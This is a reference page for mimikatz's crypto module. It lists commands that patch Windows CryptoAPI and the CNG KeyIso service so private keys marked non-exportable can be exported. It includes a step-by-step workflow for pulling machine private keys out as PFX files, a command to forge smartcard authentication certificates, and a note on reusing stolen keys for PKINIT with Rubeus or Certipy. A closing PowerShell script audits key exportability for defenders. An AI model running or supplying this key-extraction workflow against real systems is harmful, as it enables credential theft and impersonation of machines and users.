crypto

Interact with Windows CryptoAPI and CNG (Cryptography Next Generation). Patch providers to make non-exportable private keys exportable. Export certificates and keys.

Prerequisites

Most operations require privilege::debug. The cng command additionally patches the KeyIso service.


providers — List Crypto Providers

mimikatz # crypto::providers

Lists all available CryptoAPI and CNG providers on the system.


stores — List Certificate Stores

mimikatz # crypto::stores [/systemstore:<store>]
  • /systemstore:<store> — e.g. CERT_SYSTEM_STORE_LOCAL_MACHINE or CERT_SYSTEM_STORE_CURRENT_USER

certificates β€” List and Export Certificates

List certificates and key properties. Export public (DER) and/or private (PFX) keys.

mimikatz # crypto::certificates [/systemstore:<store>] [/store:<storename>] [/export]

Options

  • /systemstore:<store> — system store location (default: current user)
  • /store:<storename> — certificate store name (e.g. My, Root, CA)
  • /export — export certificates (public as .der, private as .pfx if accessible)

Examples

# List all user certificates
mimikatz # crypto::certificates

# Export all local machine certificates
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /export

# Export from specific store
mimikatz # crypto::certificates /store:My /export

keys — List and Export Crypto Keys

List and export CryptoAPI and CNG keys by provider.

mimikatz # crypto::keys [/provider:<name>] [/providertype:<n>] [/cngprovider:<name>] [/export] [/machine]

capi — Patch CryptoAPI (Make Keys Exportable)

Patch CryptoAPI functions in the current process to allow exporting keys that are marked as non-exportable.

mimikatz # crypto::capi

After patching, keys marked non-exportable can be exported within the mimikatz process scope. Combine with crypto::certificates /export to extract private keys.


cng — Patch CNG KeyIso Service (Make Keys Exportable)

Patch the KeyIso service (key isolation service) to allow exporting CNG non-exportable keys. Requires privilege::debug.

mimikatz # crypto::cng

sc — List Smartcard/Token Readers

mimikatz # crypto::sc

Lists smartcard/token readers and attempts to enumerate keys if the CSP is available.


scauth — Create Smartcard Auth Certificate

Create a client authentication certificate signed by a specified CA for smartcard authentication.

mimikatz # crypto::scauth /caname:<ca-name> /upn:<upn> [/pfx:<output.pfx>]

Workflow: Export Non-Exportable Certificate Private Key

mimikatz # privilege::debug
mimikatz # crypto::capi
mimikatz # crypto::cng
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export

This exports .pfx files with private keys that were previously marked non-exportable.


Notes

  • File system ACLs and UAC may restrict access to private key files even after patching
  • CNG keys are in the KeyIso service, CAPI keys are in process — patching both covers most scenarios
  • Exported PFX files can be used for PKINIT authentication with tools like Rubeus, Certipy, etc.
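To know which keys on a host the capi/cng patches would expose, a defender can inventory the store ahead of time: which private keys are CNG-backed (held by KeyIso), which are CAPI (in-process CSP), and which are already flagged exportable. This is an added PowerShell audit example, not mimikatz code; it assumes Windows PowerShell 5.1 (.NET Framework 4.6+) run elevated, and the machine "My" store as the default target.

```powershell
# Added audit example (not part of mimikatz). Reports, for every certificate with a
# private key, the key family (CNG vs CAPI), the provider holding it, and whether the
# key's own policy already permits export. Run elevated so machine-key ACLs do not
# hide entries; non-RSA keys (e.g. ECDSA) are listed but not inspected.
function Get-PrivateKeyExportability {
    param(
        [string]$StorePath = 'Cert:\LocalMachine\My'   # assumption: machine personal store
    )
    Get-ChildItem -Path $StorePath |
        Where-Object { $_.HasPrivateKey } |
        ForEach-Object {
            $cert = $_
            $keyType = 'unknown'; $provider = 'unknown'; $exportable = $null
            try {
                # GetRSAPrivateKey returns RSACng for CNG keys, RSACryptoServiceProvider
                # for CAPI keys, and $null when the certificate key is not RSA.
                $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if ($rsa -is [System.Security.Cryptography.RSACng]) {
                    $keyType    = 'CNG (KeyIso)'
                    $provider   = $rsa.Key.Provider.Provider
                    $exportable = ($rsa.Key.ExportPolicy -band
                                   [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0
                } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    $keyType    = 'CAPI (in-process CSP)'
                    $provider   = $rsa.CspKeyContainerInfo.ProviderName
                    $exportable = $rsa.CspKeyContainerInfo.Exportable
                } elseif ($null -eq $rsa) {
                    $keyType = 'non-RSA key (not inspected here)'
                }
            } catch {
                # Typical cause: the current token lacks read access to the key container.
                $keyType = "key not accessible: $($_.Exception.Message)"
            }
            [pscustomobject]@{
                Subject    = $cert.Subject
                Thumbprint = $cert.Thumbprint
                KeyType    = $keyType
                Provider   = $provider
                Exportable = $exportable
            }
        }
}

Get-PrivateKeyExportability | Format-Table -AutoSize
```

Keys reported as Exportable = False are the ones only the capi/cng patches would reach; keys already marked True can be exported by any principal with read access to the container, so those deserve the tighter ACLs first.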